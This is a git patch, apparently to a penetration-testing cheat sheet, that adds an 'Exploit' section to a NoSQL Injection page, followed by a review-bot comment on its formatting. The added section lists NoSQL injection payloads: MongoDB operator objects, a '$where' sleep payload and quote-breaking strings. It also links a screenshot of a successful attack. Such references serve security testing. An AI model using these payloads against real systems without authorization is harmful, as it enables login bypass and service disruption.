From a5b4f9d94f14e79952dc992cd81b540b530f4a9a Mon Sep 17 00:00:00 2001 From: Mehdi Date: Sat, 27 Jul 2024 08:47:26 +0330 Subject: [PATCH] Update NoSQL Injection.md --- NoSQL Injection.md | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) diff --git a/NoSQL Injection.md b/NoSQL Injection.md index 30fac0a..5011943 100644 --- a/NoSQL Injection.md +++ b/NoSQL Injection.md @@ -1,5 +1,33 @@ # NoSQL Injection + + ## Exploit +* The following are common NoSQL metacharacters you could send in an API call to manipulate the database: +```bash +$gt +{"$gt":""} +{"$gt":-1} +$ne +{"$ne":""} +{"$ne":-1} +$nin +{"$nin":1} +{"$nin":[1]} +|| '1'=='1 +// +||'a'\\'a +'||'1'=='1';// +'/{}: +'"\;{} +'"\/$[].> +{"$where": "sleep(1000)"} +``` + +* **Successful NoSQL injection attack using Postman:** +![nosql](https://github.com/user-attachments/assets/3dd58830-ea8e-4444-b518-0889951a4779) + + + **PHP** The exploits are based in adding an Operator
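Review bot: The fenced block added under `## Exploit` is tagged `bash`, but its contents are MongoDB operators, JSON fragments and quote-breaking strings, not shell, so it will be highlighted incorrectly; use an untagged or `text` fence instead. The list also puts three different kinds of entry under the single label "NoSQL metacharacters": bare operator names such as `$gt`, JSON operator objects such as `{"$ne":""}`, and string breakers such as `'||'1'=='1';//`. Splitting these into labelled groups, with a note on which input context each one is meant for, would let a reader use the section as a test checklist rather than an undifferentiated dump. The Postman screenshot has only `nosql` as alt text and no description of the request or the response it shows, so a sentence stating what was sent and what made the result "successful" should accompany it. The extra blank lines added after the `# NoSQL Injection` heading and after the image are stray and can be dropped. The subject "Update NoSQL Injection.md" does not say what was added.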